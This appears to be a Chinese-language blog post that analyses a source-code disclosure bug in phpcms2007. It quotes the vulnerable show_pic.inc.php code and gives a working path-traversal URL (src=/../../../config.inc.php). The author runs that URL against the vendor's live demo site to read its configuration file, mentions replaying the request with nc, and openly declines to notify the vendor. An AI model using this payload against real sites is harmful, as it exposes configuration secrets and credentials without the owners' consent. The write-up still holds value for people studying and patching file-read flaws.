关于简单的php源代码泄露漏洞的发掘

我们知道在asp中出现得最多的还是sql注入，不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义，所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣，我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿 这次我发掘的是phpcms2007的源代码泄露漏洞 再次向phpcms2007的开源行为致敬！！ 开始吧， findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的) 其他的文件操作函数可以自己定义查找 module\picture\show_pic.inc.php:8:readfile($file); 跟进这个文件看看吧，呵呵，比较小，我喜欢 [copy to clipboard] [ - ]code:
<?php
defined(’in_phpcms’) or exit(’access denied’);
require phpcms_root.’/module/’.$mod.’/include/common.inc.php’;
isset($src) or exit;
$file = phpcms_root.’/’.$phpcms[’uploaddir’].’/’.$cha[’channeldir’].’/’.$mod[’upload_dir’].’/’.$src;
if(empty($php_referer) || !strpos($php_referer, $php_domain)) $file = phpcms_root.’/images/error.jpg’;
header("content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。 先包含文件/module/’.$mod.’/include/common.inc.php 如果存在变量$src则赋予它路径并把值交给变量$file 然后就是就进入if 这里我不看其他的文件简单猜测下应该是判断url路径来源，也就是防盗链的功能 然后就header()一个图片头 呵呵，轻轻松松就readfile($file); 可以看出它没有判断$src的文件类型，如果我们提交一个src=*.php也会被readfile 好吧，在这里漏洞是出现了 不过由于“defined(’in_phpcms’) or exit(’access denied’);”，所以我们是无法直接利用这个漏洞文件的 只能是在其他包含这个文件的php文件中利用 继续吧 [copy to clipboard] [ - ]code:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt picture\show_pic.php:4:require phpcms_root."/module/".$mod."/show_pic.inc.php";
进去看看 [copy to clipboard] [ - ]code:
<?php
require "./config.inc.php";
require "../include/common.inc.php";
require phpcms_root."/module/".$mod."/show_pic.inc.php";
?>
呵呵，要是register_globals为on的话就可以直接利用这个文件读取目标文件了
那就测试吧 官方是演示站是 [copy to clipboard] [ - ]code:
http://demo.phpcms.cn/
那就这样构造url [copy to clipboard] [ - ]code:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿，读取的就是网站的配置文件 直接访问 [copy to clipboard] [ - ]code:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵，猜测没错！！ 那我们可以先访问http://demo.phpcms.cn/抓包 用nc发包 get选项就设置为 [copy to clipboard] [ - ]code:
/picture/show_pic.php?src=/../../../config.inc.php
这里我就用刺猬的一个post提交工具代替了 测试结果如图 ok，就分析到这里了 希望大家不要利用这个做违法的事，嘿嘿！！ 偶是坏孩子，不通知官方了~·好孩子去通知下。